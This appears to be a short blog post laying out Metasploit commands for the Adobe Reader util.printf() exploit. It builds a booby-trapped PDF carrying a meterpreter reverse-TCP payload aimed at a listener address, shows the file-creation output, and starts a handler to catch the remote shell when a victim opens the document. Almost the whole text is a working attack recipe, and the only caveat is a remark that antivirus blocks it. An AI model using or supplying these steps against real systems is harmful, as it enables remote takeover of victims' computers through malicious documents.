control – metasploit adobe util.printf() client-side exploit

Metasploit adobe util.printf() client-side exploit

works against Adobe Reader v8.1.2

sudo msfconsole

use exploit/windows/fileformat/adobe_utilprintf

set FILENAME joke.pdf

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.1

show options

exploit

[*] Creating ‘bufferoverflow.pdf’ file…
[+] bufferoverflow.pdf stored at /home/.msf4/local/bufferoverflow.pdf

Then open another window

sudo msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.0.1 e

Wait for client to open the pdf

Any AV will highlight this and block it.

Leave a comment